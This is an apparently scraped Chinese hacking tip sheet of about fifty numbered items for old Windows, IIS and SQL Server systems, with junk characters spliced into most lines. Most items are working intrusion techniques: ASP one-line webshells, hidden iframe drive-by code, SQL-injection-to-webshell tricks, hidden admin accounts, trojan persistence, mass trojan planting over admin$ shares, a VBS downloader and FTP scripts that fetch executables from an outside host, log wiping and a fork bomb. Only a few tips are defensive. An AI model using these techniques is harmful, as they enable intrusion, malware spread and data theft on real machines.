Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
' x4 r. S3 f8 p* ^ Lcacls C:\windows\system32 /G hqw20:R
# L, T/ u$ H0 w, Q3 c思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
" e" r! {) ^/ |# H: s恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F, S- `: |0 n5 |- g, w
' {6 i/ P" Y) X+ c2 P3 w2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。9 S, Y% s, L- G8 I0 ~$ `7 O! e5 S
; C6 o! T1 R5 v3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。0 m* b* K9 x9 T! I
% Q- f% L2 |) E7 V1 Z& t- l7 R( S4 z
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号4 O: f0 n! x: g. Y* M4 w$ P
) ^: m* A4 _. H( X- ~& u+ \5、利用INF文件来修改注册表
% z' G* t* N6 H! y. U9 `" |+ c9 B[Version]9 r q- l4 k7 U+ X1 t
Signature="$CHICAGO$"" v3 z( k6 z; s$ d+ o9 S+ M
[Defaultinstall]9 {" C8 B$ ~4 w6 b: U* l9 q: V+ G
addREG=Ating; D% x; G. O$ }& J! Y. Z+ Z0 ~
[Ating]
1 ?5 B6 k) ~ E# Q- n, H0 tHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
9 n& A' q" `# x" H' c以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
: ^8 C( R @' \3 Irundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
# I! I5 L. {9 |& }其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU: ~3 Q' B' l& G1 \
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU; l7 L3 R. [$ a9 q: a' k, y
HKEY_CURRENT_CONFIG 简写为 HKCC& F/ {/ E# J5 H
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值, f! i6 @* i& l# m. Q V
"1"这里代表是写入或删除注册表键值中的具体数据
4 q2 c4 m, }/ c4 R
# [9 g0 q* ?1 u1 _6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,- d& F' |* A" N+ S
多了一步就是在防火墙里添加个端口,然后导出其键值
. ]; k S+ O6 Y: h ^9 d[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List] p. F! L% V+ j2 G$ U" j
0 p+ p% f0 S2 R
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽# X( l. e* t# D9 ` M% c
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。6 H4 ]0 b2 g/ x" o, H- \$ q! U
8 ]2 P3 F C$ q* e$ |8 L8 r3 O
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) C9 X* K2 a% F7 }6 K/ E5 G6 W4 V; z& Z# m' h- T8 {8 [
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,$ v1 \5 r# R; i
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 u5 t1 m- n3 ~7 \: H5 Z
0 C- }8 h- x4 d. U) N10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
7 E4 n: o9 B5 y- H- o, F6 o& m9 I* p& b9 s& c8 U$ J3 s
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
8 n, s" a, l1 q! H用法:xsniff –pass –hide –log pass.txt
" ?$ Z: n" k! f8 r% S; k; \! }& M0 h. C1 m+ ^* X# V8 L
12、google搜索的艺术
7 P1 L/ I5 |# P* u6 U8 B搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”. k; n4 d j# u' N
或“字符串的语法错误”可以找到很多sql注入漏洞。% b' `/ U# i- @% b
2 r# Z6 W+ s; l- _, e% ^5 s7 U13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
d: {% h, |6 r6 ^+ J
7 a3 W4 A: p5 \14、cmd中输入 nc –vv –l –p 1987
( D9 L, v$ l- Y做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃( n- ~( {* S6 j2 s" K0 G
7 _8 j) ` K7 e7 i0 U" [* p15、制作T++木马,先写个ating.hta文件,内容为% E' Z4 r8 J; V6 ?9 M
<script language="VBScript">
- G7 b2 }$ X5 \$ uset wshshell=createobject ("wscript.shell" )* G0 J+ a' v% M l+ G; j
a=wshshell.run("你马的名称",1)3 E9 y2 D( q! u/ _5 t
window.close
_7 j; _% q# ^$ g K4 a' ?5 f4 {</script>& P6 P1 o1 p& Y/ x( C/ ~
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
) A* [$ U! ]$ l+ k* v/ N/ o& N: e/ u# O: P0 Y. C
16、搜索栏里输入
" N: E, O& F$ }" m关键字%'and 1=1 and '%'='
; ?3 A* H" k3 Q5 @3 \$ m关键字%'and 1=2 and '%'='' a7 j l! [9 g: f
比较不同处 可以作为注入的特征字符% ?0 c9 f0 C# T9 }4 O H
: |2 u0 U) @) }! A# b5 l8 ]
17、挂马代码<html>
7 g' q5 t( K3 S6 |+ [# [<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
- {, r: N/ n: B m</html># B8 S6 }0 B+ f- F- f* |0 K
+ C ?: J8 S" O& `2 E* C18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! i9 b: ?3 w3 i1 ~
net localgroup administrators还是可以看出Guest是管理员来。
4 f' k/ j5 l" D& H) j
& \; {: T2 @, N/ l19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
v: Z6 r: h3 D用法: 安装: instsrv.exe 服务名称 路径5 i$ y2 ?( G5 E
卸载: instsrv.exe 服务名称 REMOVE2 _2 S# o! D7 U6 `: \
' g" Y$ a2 [' @% C) l0 u+ n; c9 [+ N
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉0 R8 \. i; c+ }6 O- }5 |. e
不能注入时要第一时间想到%5c暴库。; x4 p2 `% y, v" V
6 u1 E" H" h! p' s+ M22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
6 f% M+ d( b7 X+ W
6 i4 D" O6 D( o& B7 g23、缺少xp_cmdshell时
9 `5 C8 t& ?- L9 ]$ n$ [: U# v尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
- [7 m" V. P ? P8 F1 o# _, j# E假如恢复不成功,可以尝试直接加用户(针对开3389的)
% |( B0 ?7 J9 z5 a- ddeclare @o int
. O! y+ s& A5 T& [; Texec sp_oacreate 'wscript.shell',@o out3 v K. W/ ^ S" Y" M. B/ ^3 t
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员4 @2 ]; L" q* A+ W3 M
- _& i+ ~2 ?: g; k24.批量种植木马.bat8 k' b7 q O+ |. p
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中9 `' t" d) X) a4 O' N4 E- i
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间 I/ S5 r0 v/ t' d6 p2 [8 [8 P6 G
扫描地址.txt里每个主机名一行 用\\开头
& Z4 m; g$ ]7 _7 H9 t/ w
0 Z e! a" r/ G. n! ~7 `/ g( B. `25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。, Z' M T- I. z
& H1 x0 N. F7 T- T
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ J2 v& @) c$ ]1 z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.% V' }& K$ X& [0 W/ y1 U
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& ]% O) B: x) n, {0 r7 D1 z) }+ ~1 U* c: P1 K. @, k8 P D
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
2 e4 u+ A( { ~8 e然后用#clear logg和#clear line vty *删除日志+ G8 v7 R; j+ D3 H. Y
$ T( m+ e! k+ m+ `7 _1 J. \' b r
28、电脑坏了省去重新安装系统的方法6 e. ~" `: u0 P. n; N+ s
纯dos下执行," D1 A, a+ ^/ b
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
# ?% o4 A# Y ~2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config8 R) ~. E0 {7 U5 i. b& u, z
! n C1 k5 N; o3 G0 W
29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 ~. p: G0 {+ L1 H( {: z4 [ ]HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip5 T. ?2 D( d$ Q' n7 ~1 U/ S
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip* Z* L+ \- r8 r! L
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip r3 k! Q" K1 l) V. S, P3 A, e
分别用
6 O+ ]$ ] \: q* n4 pregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 s% `% m, I) Eregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, p& t- I/ E, c& Sregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip( o) l% o4 `7 a
命令来导出注册表项
6 w9 X* J( S; x; b9 i2 f0 n然后把三个文件里的EnableSecurityFilters"=dword:00000001,, {1 R3 s1 t& G# Y6 a9 H
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用3 ]8 c9 b+ i1 z/ K7 R. b( B% g* ?% v
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。$ f3 A6 }, X4 \+ R- w0 s) ` W% }( ^
, c1 z1 z" v; t6 N
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
$ M! \& f4 ` q2 y E" u2 pSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
8 I! z$ r/ G @* Z/ [
( u# b" F+ V& D6 {1 e( F31、全手工打造开3389工具
: P. V# v' k& l9 A- { ]" s打开记事本,编辑内容如下:7 I6 h* Y2 o% H
echo [Components] > c:\sql8 n8 }0 X% f2 Y f
echo TSEnable = on >> c:\sql
+ \" Z9 g/ I, G! |+ c( \5 `sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
8 {- F2 t8 W! e+ a: b编辑好后存为BAT文件,上传至肉鸡,执行
: u! Y- r: |* P8 a. L( o5 P6 m$ @
9 P' Q1 G( B$ d' I& _- L" b8 l* o9 W32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
7 `+ [! X# R- L) P* M5 V/ L. F& B2 q5 G; p7 U! y0 j0 t
33、让服务器重启) j" D! h3 G, r+ m$ U' c
写个bat死循环:% A' z1 h e: q9 @+ @/ q
@echo off
- p1 k2 n2 X! }4 @:loop1
9 `4 u) N0 L- ]8 c' x) Ocls
9 W& j1 v* G, F& S8 Kstart cmd.exe6 a1 X! T) l. o+ K1 ?! D% }' o
goto loop1
$ w5 f1 _; B: w3 J$ T% a保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
4 ~, B. m0 N! \9 [5 K0 G( }( m( [( c+ V) {! X$ M! `4 _
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
; C' ~( ~: A2 Y* m4 f4 \@echo off" y0 b* A) c1 u0 {/ v3 X
date /t >c:/3389.txt
h r9 J5 J$ q9 y* U, f( z' S: Ktime /t >>c:/3389.txt
- f/ L6 _! l; q7 x/ Xattrib +s +h c:/3389.bat
* L. x6 a ]; ~attrib +s +h c:/3389.txt7 Y2 ]. d0 C# ?7 A+ {
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
% {& K7 E( {% D! v并保存为3389.bat
, |2 n7 A; v& g7 P6 f# u5 M# Q打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号 Z1 _ O' j/ x/ k+ J
/ U" @$ C- N) ~1 W; X35、有时候提不了权限的话,试试这个命令,在命令行里输入:
6 _. `9 v$ C0 K9 g! S$ O( Dstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
" ~* ]( t s" t6 n. M+ a+ _输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
2 k$ E4 [8 B. i9 |, P5 e6 J" `8 R" {( H: p
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件& m+ s4 U; H% x% L* x+ P0 p4 n
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址; J. \1 ` ^" r+ _
echo 你的FTP账号 >>c:\1.bat //输入账号
, r2 Z6 ~5 e: m# O/ z& h0 Xecho 你的FTP密码 >>c:\1.bat //输入密码! A; D7 ^- `# i6 [( f% w
echo bin >>c:\1.bat //登入! \- Q2 n _( t( ]( t
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
7 f* p6 Z1 b, V' S( }3 J$ v8 F& lecho bye >>c:\1.bat //退出
/ H0 ~4 {* A% }: ?% X: u X9 V$ p然后执行ftp -s:c:\1.bat即可/ h; N$ a4 j! a. q1 J% g2 e
4 ^8 P2 Q) I8 S# B) a$ {, L( E37、修改注册表开3389两法 h y5 `) \5 {5 ~; b% z
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
. A# |4 M4 c# G6 i2 Q: Eecho Windows Registry Editor Version 5.00 >>3389.reg: }; O" j1 W: G1 U |+ X% ~# i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
$ F9 H' \) C9 J3 `6 ]$ D1 Uecho "Enabled"="0" >>3389.reg
& g: O- |6 O% `+ N% c$ \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows: P! L0 G, f/ Q+ y- I
NT\CurrentVersion\Winlogon] >>3389.reg4 e+ n' A4 H" G& S: X8 p
echo "ShutdownWithoutLogon"="0" >>3389.reg
9 M3 p- ]8 R# `+ H9 @6 eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]. M9 z6 B9 y4 T; D0 t+ k2 E2 ^- z
>>3389.reg( L6 n D7 ~: Y! j, d' ~% O Q
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg6 b, t p0 R3 h5 _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
) D9 x: _* i# I7 S9 V3 W1 |; t>>3389.reg
$ h0 J1 v$ z8 Z+ r& @% H, ~) recho "TSEnabled"=dword:00000001 >>3389.reg9 b* ?0 @# P& Q5 s! ] Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg# n2 C+ F' a: o& x9 g2 t% b
echo "Start"=dword:00000002 >>3389.reg3 R. R* J6 d8 @( y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 l Z7 ^* E9 W; m& b+ g" a0 g>>3389.reg) w6 o2 i" P" \5 s$ T
echo "Start"=dword:00000002 >>3389.reg o6 H5 Z0 a$ ?- u/ u2 ]' p. q
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
5 q4 |5 P8 W; k N2 B) H; decho "Hotkey"="1" >>3389.reg
; H0 j6 a" Q1 M3 Z+ becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# E! \9 Y7 o6 z9 c3 Y5 |Server\Wds\rdpwd\Tds\tcp] >>3389.reg9 P1 B, g+ g5 e$ z
echo "PortNumber"=dword:00000D3D >>3389.reg
! U; [- O! C! n2 D) k5 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- ]/ i( `2 F# u+ Y; o! @. m, ]Server\WinStations\RDP-Tcp] >>3389.reg& c6 g& ^- U9 c% }9 }
echo "PortNumber"=dword:00000D3D >>3389.reg. O$ b' V" _; B- Q2 A. g p9 Q; J
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。, _) A8 J# d8 U( a
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)& X- D% Y! T) V9 e; B
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效5 O8 N2 O7 q: K0 ~: V( \
(2)winxp和win2003终端开启9 X1 r$ b5 i0 C
用以下ECHO代码写一个REG文件:9 y8 \/ J- x3 T( ?" P3 o
echo Windows Registry Editor Version 5.00>>3389.reg
! s7 I5 r3 z3 G( p; Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 m! z4 Z# a$ n, I# l7 QServer]>>3389.reg) [1 _2 T$ E" p: }+ o6 w
echo "fDenyTSConnections"=dword:00000000>>3389.reg
5 X& j( A/ ~0 `1 B5 U( mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 p4 v' G1 G. \1 U6 V+ ?. I
Server\Wds\rdpwd\Tds\tcp]>>3389.reg' E- r. x. H$ K6 F
echo "PortNumber"=dword:00000d3d>>3389.reg4 f s+ p! M& r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 h" Q7 t/ r1 n
Server\WinStations\RDP-Tcp]>>3389.reg3 F' @7 Q+ m ~$ s6 a" u F' M- b- }* z
echo "PortNumber"=dword:00000d3d>>3389.reg
# r" E" g7 X$ j9 K然后regedit /s 3389.reg del 3389.reg
5 c: ^& \' I; u: J; Q" MXP下不论开终端还是改终端端口都不需重启
; a3 d7 G# d5 @' D9 h+ ^5 a% p, Q- J8 P3 j" R2 k( Z# ~
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃 U/ c/ K8 _% t5 [/ o
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
4 y: C% |9 R6 K# x( }+ I$ O( B: {6 R0 O" R. q
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
6 g8 D" o8 T# @5 |3 u(1)数据库文件名应复杂并要有特殊字符/ S) b- c/ }" C% G8 w2 }
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源2 r- l/ b( u( `( n9 t
将conn.asp文档中的
# v6 P' R8 g% c+ Q+ U* ^DBPath = Server.MapPath("数据库.mdb")
6 A) A* }. Y. R- vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
2 _: [5 k4 q" W6 Y) T1 ?! I
/ j0 Y. R3 m2 o7 _; R2 d X修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置7 e+ v* e3 C; U7 X, S! a: U. w
(3)不放在WEB目录里* t) F; s. \& Z* H& v# k d4 S
) d% O7 B8 W3 U3 e( x5 {. x. j
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉) F" s3 k# C. a& E! ^% D. K9 Q9 f8 M0 S
可以写两个bat文件
) H2 N5 ]' E1 Z@echo off
2 R# i* C( u3 x( s( M0 d$ @7 z \8 ~@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe1 U l0 o& h* j$ k+ j) S+ K& ?
@del c:\winnt\system32\query.exe- g0 v. }* ]9 k- y/ ^ G
@del %SYSTEMROOT%\system32\dllcache\query.exe( N: @0 N5 N1 C+ x+ Q
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
$ @( o0 }, p" e; Q. t! p" o; B! e, O+ X& U& l6 |! W
@echo off) B! P6 A6 O" E, B9 f4 a: E! B. N
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe2 q" |8 `. a7 m/ O
@del c:\winnt\system32\tsadmin.exe, q8 m2 C% F# ?, x
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex8 H5 M5 p, _3 N7 |: u, O) K; s' z
8 A* w. @. j0 G6 D6 l
41、映射对方盘符: J9 q5 P. B% l0 W# i2 @/ m
telnet到他的机器上,* q8 n6 T6 j' H0 O. W. U
net share 查看有没有默认共享 如果没有,那么就接着运行) _7 l5 i8 Y" C* `9 [" X% m" P
net share c$=c:- R$ }' N0 Q0 \6 [% {5 G
net share现在有c$, r# V8 `9 l" f0 _; J" E
在自己的机器上运行
) E+ S4 [5 {" Qnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K7 q0 L, ]; m' c; {- {
; O* H) _7 r+ [3 j42、一些很有用的老知识( [, L! t. ]: ~* U4 p& @
type c:\boot.ini ( 查看系统版本 )- G; g% N+ N o; R5 W2 k
net start (查看已经启动的服务)0 g; g7 c O$ C, t$ K9 z
query user ( 查看当前终端连接 )
4 X7 b& w4 B: Y! X' i* Hnet user ( 查看当前用户 )
E/ \9 r* L; A- L( hnet user 用户 密码/add ( 建立账号 )9 x. T/ @7 Y! C8 ]# ?' {
net localgroup administrators 用户 /add (提升某用户为管理员)
% j- s( [' J, C) W. z% Mipconfig -all ( 查看IP什么的 )/ D. {, }' B9 Y9 N: E* a
netstat -an ( 查看当前网络状态 )2 \2 a I1 M; i$ l2 |) B
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
& x) P6 H" X& t- f* h) }3 }克隆时Administrator对应1F4/ d2 e4 ~1 c q) Q
guest对应1F5
% r$ p5 A! t! ~1 h {3 j9 ytsinternetuser对应3E8- Q% _8 m4 Y: a% g5 {
( \) B% ^) ^( X; H) j% ?6 d
43、如果对方没开3389,但是装了Remote Administrator Service7 O" N& l) U! b2 `
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接9 B1 {0 K# y: q6 T# o7 ?1 \6 k
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息. T0 U" a% c$ q6 H3 T" ]! x
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"* {! L. j* q4 m
, u& N/ S% D2 R0 S1 J2 \7 U& u
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)1 W* x( D& {, Q0 J. J, p6 [+ f* l
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
# B: B* ~$ W2 H- Y- I- y( _
. W Z) @- e2 V4 {& T. q45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
0 v8 t6 ^; Z9 |echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
# s9 y4 K& O. F3 X) b& q; x^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =$ q/ o3 d6 y- X& i! p8 f4 C0 o- T
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =+ a8 G5 g. X+ O3 |' y
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
% b$ S- w/ l3 |2 z" N) {(这是完整的一句话,其中没有换行符)# Q, {( K7 h* W/ U
然后下载:' v( O- a- g2 j) U: a4 @( A* {2 S
cscript down.vbs http://www.hack520.org/hack.exe hack.exe7 n6 a0 `& v: N6 P" O9 a- p6 v- J
: p9 z8 a! D& G; h5 Z8 Y0 |
46、一句话木马成功依赖于两个条件:6 A9 q: K) p. _( B
1、服务端没有禁止adodb.Stream或FSO组件2 V1 g/ A2 n0 y0 L
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
' _. w2 ?6 Q+ m
' }/ [& q3 M: s6 Z- p- r' ~, u47、利用DB_OWNER权限进行手工备份一句话木马的代码:
; D. B. x7 Q0 D' g1 }& }# x;alter database utsz set RECOVERY FULL--
g- x j3 J; ~* O+ `;create table cmd (a image)--7 j% g( {' I: g( m
;backup log utsz to disk = 'D:\cmd' with init--; T0 _: f- ^% _. @! V
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--' M: `% r$ M+ p- y
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--% a0 l& @( _& d& F: h! N
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。' F3 s+ @0 [/ z$ ]7 h0 \) p
5 n( i& a( m# i- x% O3 Z, Z: d48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:1 b$ ^ }1 X% J7 e% @& W, c
. K8 [* V2 X& O* c9 l用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
# K! s5 p- G0 b0 G* |: Y所有会话用 'all'。# q- J E1 T( [4 n
-s sessionid 列出会话的信息。$ m( A/ B# B* c$ _
-k sessionid 终止会话。
2 f& g7 i8 t6 g2 {-m sessionid 发送消息到会话。0 }. e+ |8 f6 Z3 G( k
" d1 e) C+ a# |9 Y2 [* j
config 配置 telnet 服务器参数。6 {$ O; {- j/ S0 \
: k6 V. J) y' L! M# N. x2 L
common_options 为:% `1 [3 E' K; }5 ]
-u user 指定要使用其凭据的用户
8 C9 b" c* D% s u-p password 用户密码6 @" u% P8 ~! y$ k( J* o
3 k& _9 t Z! Y
config_options 为:
9 Q3 B% ~1 v' ^/ Jdom = domain 设定用户的默认域6 B' U! w p1 S' G
ctrlakeymap = yes|no 设定 ALT 键的映射9 M u$ F, X# c4 m/ g0 h
timeout = hh:mm:ss 设定空闲会话超时值
9 L3 Q1 g) y% }' W( Y1 e' g& Etimeoutactive = yes|no 启用空闲会话。. P( |/ F4 ?9 ~
maxfail = attempts 设定断开前失败的登录企图数。
* Q, s; y% [2 f" D0 k Z1 q' ?7 I! nmaxconn = connections 设定最大连接数。
8 {; P3 D, s, f9 V' ]$ ^1 A6 Yport = number 设定 telnet 端口。
# y+ a' K' X) O ~sec = [+/-]NTLM [+/-]passwd" u! [2 a$ @; P$ y1 L& A4 d7 Z6 j
设定身份验证机构+ V9 V ^: }2 |
fname = file 指定审计文件名。' `, W0 w L. z7 c8 S
fsize = size 指定审计文件的最大尺寸(MB)。3 C: N2 P0 H6 R) }7 U* y
mode = console|stream 指定操作模式。" J B) c) G" Z8 E% _9 C
auditlocation = eventlog|file|both
# ~9 o2 n& p' Q% r指定记录地点
; [ h7 V- f1 I" i# qaudit = [+/-]user [+/-]fail [+/-]admin
- j+ N ?1 K3 T: Z! k% R0 `/ l0 j- D0 R) e4 _4 I4 d3 N- ]& @
49、例如:在IE上访问:
" @6 d7 }5 p' J+ Mwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
& ^% F+ M$ i3 Phack.txt里面的代码是:
/ V' z" z- V: C5 m/ Q<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">& N' U8 r' k$ I" ~, ?
把这个hack.txt发到你空间就可以了!) V# _; S' q) w, d9 j1 O$ M8 }* q
这个可以利用来做网马哦!; }8 s# r6 V4 Q/ }- F3 K( W/ c; k8 A
@& W* z/ G, i% w" N- ?7 o2 t50、autorun的病毒可以通过手动限制!
. W$ }3 o; n: V. l- i' E) X1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
; e5 r) N } b- P8 Q7 S9 g) l9 n2,打开盘符用右键打开!切忌双击盘符~% k/ N) Q4 {; k
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!- i- Z0 g# C7 y0 p7 Z Z
' w7 k3 q" g6 R2 v/ X51、log备份时的一句话木马:& F/ v4 J: c: c$ ^* G1 B* A: f
a).<%%25Execute(request("go"))%%25>
* T/ r: R$ P! t) @: H' A8 Jb).<%Execute(request("go"))%>
2 e/ T) {) {. X4 Vc).%><%execute request("go")%><% q8 b! `' M- {3 Z5 u
d).<script language=VBScript runat=server>execute request("sb")</Script>7 M# B; |; Y/ ?9 N
e).<%25Execute(request("l"))%25>
) D2 | u; F+ M' s7 rf).<%if request("cmd")<>"" then execute request("pass")%>
6 G6 \ I4 I4 k1 c) p% M( I! S+ G' X3 J/ L7 R6 H# ~% m9 H! S
